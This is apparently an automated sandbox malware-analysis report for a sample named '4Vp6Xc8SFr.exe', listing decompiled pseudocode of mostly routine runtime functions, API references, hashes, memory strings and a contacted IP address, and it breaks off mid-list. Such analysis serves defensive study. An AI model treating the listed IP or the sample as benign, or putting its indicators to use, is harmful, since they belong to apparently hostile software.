Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\4Vp6Xc8SFr.exe
API String ID: 3580290477-1369563247
Opcode ID: 6f3077debb45c183931d20493d9794d1e878d563dbd2d166ed5fea5177bb5a05
Instruction ID: 8969b95f9412f05e38a9115bf6d1ebc9eb281ac98a7f6e7a9f58bb3ab5d8e94a
Opcode Fuzzy Hash: 6f3077debb45c183931d20493d9794d1e878d563dbd2d166ed5fea5177bb5a05
Instruction Fuzzy Hash: 7A413F31A08A52C5F716BF25A4400BCB7A4FB54B94BD44077EE4D83B56DF3EE5618320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EC058 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7DA8EC058(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FF77FF7DA8DAD20(0x1470, __rax, __r10, __r11);
				_t62 =  *0xda90d008; // 0xe3add53f52b8
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0xda91ca20 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0xda8ec199;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0xda8ec102;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0xda8ec0ee;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0xda8ec0d0;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FF77FF7DA8EF008();
				if (0 == 0) goto 0xda8ec191;
				if (0 == 0) goto 0xda8ec181;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ec191;
				if (0 + _a24 < 0) goto 0xda8ec14e;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0xda8ec0c5;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E00007FF77FF7DA8DACF0(_t39, 0, _a5176 ^ _t91 - __rax);
			}

APIs

WriteFile.KERNEL32 ref: 00007FF7DA8EC16F
GetLastError.KERNEL32 ref: 00007FF7DA8EC191

Strings

U, xrefs: 00007FF7DA8EC11B

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: cbd666aba2bb15de6fc291f49156f042584acd825790bad85113b2b824c09ea5
Instruction ID: 4a64c5f184a8f9623ee4b0edb0a20097f71479b71b624e632fb12c652ac54429
Opcode Fuzzy Hash: cbd666aba2bb15de6fc291f49156f042584acd825790bad85113b2b824c09ea5
Instruction Fuzzy Hash: C441D262B18A41C6EB21EF25E8443ADA7A0FB98794FD04032EE8D87789DF3DD551C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EE458 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00007FF77FF7DA8EE458(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				short _v550;
				signed int _v552;
				void* _t38;
				signed long long _t54;
				signed long long _t55;
				signed short* _t57;
				signed short* _t59;
				void* _t67;

				_a8 = __rbx;
				_a16 = __rsi;
				_t54 =  *0xda90d008; // 0xe3add53f52b8
				_t55 = _t54 ^ _t67 - 0x00000240;
				_v24 = _t55;
				_t59 =  &_v552;
				r8d = 0x20a;
				E00007FF77FF7DA8DC170();
				if (GetCurrentDirectoryW(??, ??) - 0x104 > 0) goto 0xda8ee4cc;
				if (_v552 == 0) goto 0xda8ee527;
				if (_v550 != 0x3a) goto 0xda8ee527;
				_t37 =  >  ? _v552 & 0x0000ffff : _t59 - 0x20;
				_t38 = ( >  ? _v552 & 0x0000ffff : _t59 - 0x20) - 0x40;
				goto 0xda8ee527;
				E00007FF77FF7DA8EDC90(_t59 - 0x61, _t59,  &_v552);
				_t57 = _t55;
				if (_t55 == 0) goto 0xda8ee4f4;
				if (GetCurrentDirectoryW(??, ??) != 0) goto 0xda8ee501;
				E00007FF77FF7DA8E4394(_t55);
				 *_t55 = 0xc;
				goto 0xda8ee51f;
				if ( *_t57 == 0) goto 0xda8ee51f;
				if (_t57[1] != 0x3a) goto 0xda8ee51f;
				_t41 =  >  ?  *_t57 & 0x0000ffff : _t59 - 0x20;
				_t42 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
				E00007FF77FF7DA8E9D68(_t55, _t57);
				_t26 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
				return E00007FF77FF7DA8DACF0(( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40,  *_t57 & 0x0000ffff, _v24 ^ _t67 - 0x00000240);
			}

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7DA8EE498
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7DA8EE4EA

Strings

:, xrefs: 00007FF7DA8EE4AE

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: f2a9e9c1225eb9de7e3afc0d23570f78feabd40aa089f82e1c28c8a4464eb2f9
Instruction ID: 82c9c78bf414f511082255021e3625f2f7503b3aea1454c6abb25101f09aa1ce
Opcode Fuzzy Hash: f2a9e9c1225eb9de7e3afc0d23570f78feabd40aa089f82e1c28c8a4464eb2f9
Instruction Fuzzy Hash: 5D21D262A08682C5FB21AB11D04426DB3B2FB98B44FC54076DE8D43286DF7DEA55C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8D2770(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t30;
				void* _t31;
				signed long long _t35;
				signed long long _t36;
				void* _t53;
				void* _t54;
				void* _t62;
				void* _t63;

				_t57 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF7DA8DAD20(0x1448, __rax, _t62, _t63);
				_t55 = _t54 - __rax;
				_t35 =  *0xda90d008; // 0xe3add53f52b8
				_t36 = _t35 ^ _t54 - __rax;
				_a5152 = _t36;
				_t37 = __rcx;
				E00007FF77FF7DA8D1040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
				if (_t36 == 0) goto 0xda8d2849;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, _t37,  &_a1056, "Fatal error detected", _t53, _t57);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d2863;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
			}

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D2841
MessageBoxA.USER32 ref: 00007FF7DA8D285D

Strings

Fatal error detected, xrefs: 00007FF7DA8D2815, 00007FF7DA8D284F

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: e64589603809c6563179afa31cc063d3115a20461626242b215755058f5ef0d7
Instruction ID: 09c06761bb31815aa465a404052e0505d083b182c8e9e88779f6d44de5741495
Opcode Fuzzy Hash: e64589603809c6563179afa31cc063d3115a20461626242b215755058f5ef0d7
Instruction Fuzzy Hash: D421A47262868291FB21A711F4517EEE364FB84788FC44036EE8D47696DF3CD215C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8D2880(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t30;
				void* _t31;
				signed long long _t35;
				signed long long _t36;
				void* _t53;
				void* _t54;
				void* _t62;
				void* _t63;

				_t57 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF7DA8DAD20(0x1448, __rax, _t62, _t63);
				_t55 = _t54 - __rax;
				_t35 =  *0xda90d008; // 0xe3add53f52b8
				_t36 = _t35 ^ _t54 - __rax;
				_a5152 = _t36;
				_t37 = __rcx;
				E00007FF77FF7DA8D1040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
				if (_t36 == 0) goto 0xda8d2959;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, _t37,  &_a1056, "Error detected", _t53, _t57);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d2973;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
			}

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D2951
MessageBoxA.USER32 ref: 00007FF7DA8D296D

Strings

Error detected, xrefs: 00007FF7DA8D2925, 00007FF7DA8D295F

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 68193cdc83b7fab7fc98566493fdd9e07c0501d384b8ccfc8adb870b89089dd9
Instruction ID: 1ebf4ac4d87b07b52c239a12310cab0128f6839bec8762b467d66b1b1ca75ace
Opcode Fuzzy Hash: 68193cdc83b7fab7fc98566493fdd9e07c0501d384b8ccfc8adb870b89089dd9
Instruction Fuzzy Hash: 8821A47262868291FB21A710F4517EEE364FB84788FC44036EE8D57696DF3CD215C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DEF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7DA8DEF44
RaiseException.KERNEL32 ref: 00007FF7DA8DEF8A

Strings

csm, xrefs: 00007FF7DA8DEF77

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: bd59b9720ee897d7d1652bd34f9af743e796f0d4fc22b8e7cfc7830ab81a6d3f
Instruction ID: 97dbde3b5d71cb860da9faffc84137b64a69edaef29c66b9854fe3e91e018ce8
Opcode Fuzzy Hash: bd59b9720ee897d7d1652bd34f9af743e796f0d4fc22b8e7cfc7830ab81a6d3f
Instruction Fuzzy Hash: 58114F32618B4182EB129F15E44026DB7A1FB98B94F9842B6EE8C07765DF3DD5618710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EEF5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EEF5C(void* __ecx) {
				signed int _v16;
				signed long long _t11;
				signed long long _t12;
				signed long long _t15;

				_t8 = __ecx;
				_t11 =  *0xda90d008; // 0xe3add53f52b8
				_t12 = _t11 ^ _t15;
				_v16 = _t12;
				if (__ecx - 0x1a <= 0) goto 0xda8eefa6;
				E00007FF77FF7DA8E4374(_t12);
				 *_t12 = 0xf;
				E00007FF77FF7DA8E4394(_t12);
				 *_t12 = 0xd;
				E00007FF77FF7DA8E9D00();
				return E00007FF77FF7DA8DACF0(0, _t8, _v16 ^ _t15);
			}

0x7ff7da8eef5c
0x7ff7da8eef62
0x7ff7da8eef69
0x7ff7da8eef6c
0x7ff7da8eef74
0x7ff7da8eef76
0x7ff7da8eef7b
0x7ff7da8eef81
0x7ff7da8eef86
0x7ff7da8eef8c
0x7ff7da8eefa5

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EEF8C
GetDriveTypeW.KERNEL32 ref: 00007FF7DA8EEFCC

Strings

:, xrefs: 00007FF7DA8EEFB5

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 4b6db1c40c9d890671ff636fdf246fe8f5bd585064f0dc2380975813143fd2c7
Instruction ID: 56764db0fb45533eeef615550688b1813be8c187163606c3d8f6a03f65e012c8
Opcode Fuzzy Hash: 4b6db1c40c9d890671ff636fdf246fe8f5bd585064f0dc2380975813143fd2c7
Instruction Fuzzy Hash: 6D01B121A18202C6FB22BB60945127EE7A0FF64704FC400B7DD4C86292DE3EE664C624

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744F7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON310 ref: 00007FFCFD744FCC
PyUnicode_FromString.PYTHON310 ref: 00007FFCFD744FE3

Strings

no such name, xrefs: 00007FFCFD744FC2

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: String$Err_FromUnicode_
String ID: no such name
API String ID: 3678473424-4211486178
Opcode ID: 208cd209768e337a8722fdb4b9417dca1348e3f14576b62c638d7b51e3622af1
Instruction ID: 87b1ec518e31440e291d07923f1a2848e37d66d2363c8662dda0649ba09af64c
Opcode Fuzzy Hash: 208cd209768e337a8722fdb4b9417dca1348e3f14576b62c638d7b51e3622af1
Instruction Fuzzy Hash: 9C016775A18D5AC1FB628B12E8207F9A350BF99B46F440433D96E4A7D8FF2CD115C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD742640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_PyObject_GC_New.PYTHON310(?,?,00000000,00007FFCFD7425C3), ref: 00007FFCFD742646
PyObject_GC_Track.PYTHON310(?,?,00000000,00007FFCFD7425C3), ref: 00007FFCFD742678

Strings

3.2.0, xrefs: 00007FFCFD742654

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Object_$Track
String ID: 3.2.0
API String ID: 16854473-1786766648
Opcode ID: 67925079c3bde44a90e15dbc745b9b94f72a09cbeef2eb16501d19ce5629974f
Instruction ID: a9f204e6daa981a95452223c0a18563e8fdeb076c7bc3d9fed35e2a59cc1f476
Opcode Fuzzy Hash: 67925079c3bde44a90e15dbc745b9b94f72a09cbeef2eb16501d19ce5629974f
Instruction Fuzzy Hash: 08E0ED65E06F2AD1EB168B11A4600A9B2A4BF0AB56B440136CD6D0A398FF3DE164C2B1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFDA9B080 Relevance: 5.2, APIs: 4, Instructions: 239COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(00007FFCFDA9AFEB,00000000,?,00000000,00007FFCFDA9A289), ref: 00007FFCFDA9B1BB
memchr.VCRUNTIME140(00007FFCFDA9AFEB,00000000,?,00000000,00007FFCFDA9A289), ref: 00007FFCFDA9B203
memchr.VCRUNTIME140(00007FFCFDA9AFEB,00000000,?,00000000,00007FFCFDA9A289), ref: 00007FFCFDA9B21D

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: c5e960affa148b692ef3d217ac06fb5c7be25dddca428b8f48f7e9c294a6392b
Instruction ID: a8207335825f2c2966b3f1a575377066af4f2bb44158dfc950c734e791dfee55
Opcode Fuzzy Hash: c5e960affa148b692ef3d217ac06fb5c7be25dddca428b8f48f7e9c294a6392b
Instruction Fuzzy Hash: 9C91E162B0869982EB10CB26D4E423DE7A0FB85BC4F584035EF5C83BD5EE2CE845C765

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 64.185.227.155 64.185.227.155
Source: Joe Sandbox View	IP Address: 64.185.227.155 64.185.227.155

Source: 4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326576109.0000017AC9FC9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326611429.0000017AC9FCC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317531193.0000017AC9FCB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 